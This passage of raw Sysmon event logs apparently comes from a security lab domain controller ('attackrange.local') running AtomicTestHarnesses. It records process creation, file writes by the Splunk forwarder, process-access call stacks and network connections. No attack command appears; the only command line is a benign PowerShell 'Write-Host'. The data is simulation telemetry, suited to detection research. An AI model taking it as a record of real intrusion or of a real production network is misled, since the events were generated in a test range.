s_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002234929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.203{05ADC7E1-6D1E-603E-52AA-00000000AD01}13356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Comma Write-Host b9825dcd-3aa0-4f6d-8404-4aa582c8dbffC:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002234928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.168{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.074{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.074{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002234925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.043{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BC02177FC27828C302CC44E7609F4A95,SHA256=DE1EF6A8F249AC38783B70C95521322A062557CD974451678F0CED563C3A9685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.023{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A9E574654B54E67C93CBC5EE1BFC12A,SHA256=F94086D974801B76F5B0B68142C4915BAE52E58C981BBFF51D99BA2FED53702C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.023{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.023{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002234921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.015{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A7A0957E0553D32B321AF59489FD6E4,SHA256=9DEC181467E5B6B8B4524F33E5A99DF3784EC126A04426173CD674728EF7343A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:42.015{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BA91EE99CDE1C276EB6E29815406CC0,SHA256=3923D5F898D48F573AA888F16965983020F600C4A29AF3AF6503D5FD956D50F8,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000002234919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:51:41.996{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820\PSHost.132591775019144994.12820.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002234986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:43.090{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DE003B8854FBA689C976B52A7D94DBBB,SHA256=DAE01095D470A2A8F957C9C0F70403F8E2CCDA9ED69D0F03AAD8C9A31079A217,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:43.043{05ADC7E1-6D1E-603E-54AA-00000000AD01}9184ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:34.276{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60112-false10.0.1.12-8000- 23542300x80000000000000002234988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:44.106{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F901900FF0128DA0B85A166202BA883B,SHA256=58AD0EB167F090653950919539FD2D5CCB42CE64057A776BDD27B0F2C97502F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:43.996{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=353CA684A3DD9182386A33985494A354,SHA256=C1EA9767F2E3645C158F110272A04162CCFC6507EBF60C3985DCA4AA757EC5DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:34.394{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-64072-true2001:500:200:0:0:0:0:bb.root-servers.net53domain 23542300x80000000000000002234990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:45.023{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8914DCCB4793CD44EEA75C41EB1DD67C,SHA256=F57506134D00CE05A12DC1BECACF43C4B4595AE31D31C04A12B832296D8A2777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:46.043{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C56329B9AB2F065BAD65117140220FFB,SHA256=B8070C18126A668DC5D9D9FB2DC339F1919E1A40014D308AFF1DB3E894F2B700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:45.996{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76BB63119945523B5D5095C96808C52C,SHA256=FA1BD44566EB10B1DAF35E0F743731AED4F49D372B0A85F478703E61A2F7A9BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:47.074{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C5B95B22A21FA5041123FFEB664CAEE,SHA256=D2652AB17A4D12D4360DC37540B56ED8B8E3D9C28E219CE93E9E18708BE19382,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:48.777{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50F23AFEF6735E1698E67AD5DC154A48,SHA256=E0C15E14808B92A25DCB24A358E296D7E7856F0D33AE7BB1E0143742D7A3DC43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:48.090{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CD13DF80374412AF17BD527215FDC8C,SHA256=AFCA7FA2FFB5A9B3C52A765468C11D8B13BA42048BEEF7998E228BA61F81145D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:49.816{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=676D4326B715F7E0FEE9E4FC15FC3F4D,SHA256=07B43D8EB88D738C2004D0F64B66BC26F335C5DAF6E5DB4906F06FB983041F85,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:39.307{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60113-false10.0.1.12-8000- 23542300x80000000000000002234997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:49.090{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F4A53976218CF00DA4505366ADB114D,SHA256=CEEA92E9EBA555DA0A7CFA57BF97451A26BB5FC762A92E4F8F6D496F156D4175,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:50.106{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDCA8FAFCF06642C837337B3CF625349,SHA256=D63A5C3C8E665D420E87EE2E2B013F321B4251699EDEFCD0350794931F9CAFD1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002235004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:40.901{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60114-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000002235003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:40.901{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60114-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 23542300x80000000000000002235002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:51.606{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1655CF47098C313C8BD632615B58B979,SHA256=DE396CD6E3A631391970947D4A0C5817FEDDC9974AE36086569ABD3A98FF1A5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:51.137{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63DB33DFDFF6DBC889FC3EF75821DA68,SHA256=C6C5762FA8EA7F13A6C7B7CB216722BE582A58DD8A29347C30E5825B86D13441,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:52.152{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FEF9C5EB47EF7F58877D68D84B26DDC,SHA256=9E39D207F13480A3088854241D0E6B85F128C67D043E063A12A3C66B264C7F3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:53.168{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=944D1E80F94FF318A341D0C7E19EEE79,SHA256=8B9296A1A4CD659AE93CD6E32CCB75B3347549C6C1C8F278A5D9CF453AB15BDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.965{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B71B9026AEF34679D62C746F4D44F0B1,SHA256=AF2605AACC70F1B0DEE565D46CE1632822E23F7DE5A00873C1264FA341850365,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002235018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:44.307{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60115-false10.0.1.12-8000- 10341000x80000000000000002235017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.559{05ADC7E1-6D2A-603E-55AA-00000000AD01}508815548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.371{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D2A-603E-55AA-00000000AD01}5088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.371{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.371{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:54.371{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 